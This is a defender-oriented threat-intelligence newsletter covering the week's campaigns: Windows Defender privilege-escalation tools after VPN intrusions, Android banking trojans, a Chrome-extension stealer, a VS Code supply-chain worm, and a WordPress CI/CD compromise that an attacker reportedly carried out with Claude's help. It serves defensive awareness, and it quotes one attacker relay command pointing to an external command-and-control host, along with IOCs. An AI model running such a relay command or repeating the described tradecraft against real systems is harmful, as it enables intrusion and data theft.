EvilBit Threat Digest - Patch Now or Pray Later: Nightmare-Eclipse, VPN Pivots, and Four Fresh Android Bankers
Nightmare-Eclipse Defender LPEs land in real intrusions, four Android bankers share 800+ targets, and Claude helps hijack BuddyBoss WordPress.
Before we get into it: KryptoKat founded this digest and is now heading back to the frontlines of cyberdefense, so I'm carrying it forward with the same defender lens she built it on. She set a high bar for no-fluff defender intel, and my job now is to keep it there.
This week's noise floor is loud with supply-chain weirdness, phishing that laughs at your email gateway, and some genuinely nasty Android banking families that treat accessibility services like an all-access backstage pass. Four distinct campaigns hit over 800 financial, crypto, and social apps, while defenders debate whether "just don't sideload" counts as strategy.
The real operator headline is the first confirmed real-world sighting of Nightmare-Eclipse privilege-escalation tooling after a FortiGate SSL VPN compromise. BlueHammer (CVE-2026-33825) got its patch in Microsoft's April 2026 release; RedSun and UnDefend remain unpatched as of this writing. The crew also dropped BeigeBurrow, a Go-compiled yamux relay that runs as agent.exe -server staybud.dpdns.org:443 -hide and gives the operator pivot access to anything the compromised host can reach. If your VPN logs show logins from Russia, Singapore, and Switzerland in the same session, start hunting user-writable paths for FunnyApp.exe (a public BlueHammer build pulled straight from GitHub, typically dropped in \Pictures\), RedSun.exe (often in \Downloads\), undef.exe, and z.exe. Defender quarantine hits on Exploit:Win32/DfndrPEBluHmr.BZ are the obvious tell.
Huntress dropped the primary details; the same cluster showed up in a parallel Cybersecurity News writeup with overlapping IOCs. Patch the Defender antimalware platform to at least 4.18.26030.3011, block the listed IPs (78.29.48.29, 212.232.23.69, 179.43.140.214), and watch for staybud.dpdns.org. The tradecraft here is classic post-VPN recon followed by local escalation attempts that mostly failed until the tunnel went up. Blue teams should treat this as a live fire drill for VPN initial access plus LPE chains.
Android bankers are running four concurrent campaigns
Zimperium zLabs documented RecruitRat, SaferRat, Astrinox, and Massiv operating in parallel. They abuse the Session Installation API, accessibility services, and overlay attacks to steal credentials from over 800 legitimate banking, crypto, and social media apps. The Session Installation trick lets them sideload without the usual scary prompts; accessibility gives them input injection and screen capture on demand.
The report includes more than 100 SHA256 hashes, solid MITRE mappings (T1417.001 for accessibility abuse, T1513 screen capture, T1636 credential stealing, and a laundry list of defense evasion), and details on C2 protocols. Corporate devices running BYOD policies are the obvious soft target. Review accessibility grants, block sideloading outside the Play Store, and deploy mobile threat defense that actually looks for overlay and accessibility abuse patterns. This is the kind of campaign that makes "we use MDM" feel like a participation trophy.
Chrome extensions, ClickFix, and an exposed C2 database
A Brazilian banking stealer campaign used ClickFix lures and PowerShell to force-install a Chrome extension (ooidffpmpnebkcjneofkaidbcafefiag) via enterprise policy abuse. The extension hijacks sessions, logs keystrokes, captures screens, and supports real-time Pix fraud. The kicker? The operator left the entire C2 unauthenticated, exposing data on 59 victims including the enrollment token you should revoke yesterday.
Breakglass Intelligence published the full autopsy, including the unauthenticated API endpoints that let anyone query the stolen data. Block the listed hashes, watch for ExtensionInstallForcelist registry changes, and treat any unexpected Chrome Cloud Management enrollment as a five-alarm incident. This one feels like the attacker got excited about the persistence technique and forgot to close the barn door.
Supply chain hits keep the weirdness high
Void Dokkaebi (North Korea-aligned) is infecting developer repositories through fake job interview lures, injecting tasks.json and JavaScript into 750+ repos including legitimate OSS projects. The worm-like propagation uses VS Code tasks to spread, then drops DEV#POPPER RAT and stealers over blockchain C2. Trend Micro's report includes solid mitigations: add .vscode to .gitignore, enforce signed commits, and scrutinize any coding test that wants you to run a full workspace.
Separately, a French actor used Claude to compromise the BuddyBoss WordPress platform's CI/CD pipeline, backdoored updates on the official CDN, and exfiltrated 29 GB of SQL dumps, 150k+ user accounts, and live Stripe keys from 246 sites. The poisoned releases are BuddyBoss Platform 2.20.3 and BuddyBoss Theme 2.19.2; if you're running either, assume compromise and roll back. Ctrl-Alt-Intel's two-part analysis (part 1, part 2) reads like a sci-fi heist gone corporate, and Cybernews independently corroborates the scope. Disable auto-updates, revert to known-good backups, and rotate every secret you can find.
On the lighter side, someone hid BASE64-encoded, XOR-obfuscated PE malware inside valid WAV files after a Telnyx PyPI supply-chain compromise. SANS ISC handler Didier Stevens published decoding scripts. Old-school stego never dies; it just finds new containers.
QR codes, SIM farms, and the usual IoT misery
ReversingLabs detailed evolving quishing that splits and nests QR codes inside PDFs and images to dodge SPF/DKIM/DMARC checks. Kimsuky is heavily involved. Automated QR decoding and reputation scoring on extracted URLs are now table stakes.
Infrawatch mapped 87 ProxySmart SIM farms across 17 countries feeding mobile proxy services for fraud and evasion. The shared control plane makes takedowns harder. Hunt the specific SHA-256 hashes and watch for multi-carrier egress patterns.
The usual background radiation continues: a Nexcorium Mirai variant hitting TBK DVRs and Huawei gear, a concentrated fleet of 21 IPs behind nearly half of recent RDP scanning (AS213438/ColocaTel), and the perennial cargo-theft operators abusing RMM tools like ScreenConnect, Pulseway, and SimpleHelp.
Closing thought
The overlap between state actors, MaaS operators, and opportunistic criminals is blurring faster than your average EDR can keep up. One crew uses blockchain for C2, another hides payloads in audio files, and a third leaves their victim database wide open while force-installing Chrome extensions. The common thread is persistence through trusted mechanisms: accessibility services, enterprise policies, CI/CD pipelines, and job interview desperation.
Patch the things that matter this week (Defender for CVE-2026-33825, marimo if you're running notebooks, and anything Cisco FMC related). Rotate secrets like it's going out of style. And maybe stop letting candidates run arbitrary VS Code workspaces during interviews. Your future self will thank you.
Mind the threads. The web remembers.
~ UncleSp1d3r
Also crossed my desk this week
- ChainShell: MuddyWater's Russian MaaS Link (JUMPSEC)
- ALBIROX Malware Analysis (JUMPSEC)
- APT35 Preset Scouting with Cyber-Kinetic Linkage for 'Epic Rage' Actions
- The Coordinated Embassy Hunt: Unmasking the DPRK-linked GitHub C2 Espionage Campaign (StrikeReady)
- New PureRAT Campaign Uses PNG Files To Conceal Fileless Payloads
- Beyond BITTER: MENA Civil Society Targeted in Hack-For-Hire Operation (Lookout)
- Dead Souls in Infrastructure: Zmiy's Attack on Healthcare (Solar 4RAYS)
- Live off the Land? How About Bringing Your Own Island? UNC1945 Overview (Mandiant)
- Magento Developers Impersonated in Targeted GitHub Malware Operation (Sansec)
- Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud
- Finding the Unknown Unknowns, Part 4 (NilePhish, SneakyChef, MuddyWater, +1) (StrikeReady)
- Investigating Storm-2755: "Payroll Pirate" Attacks Targeting Canadian Employees (HivePro)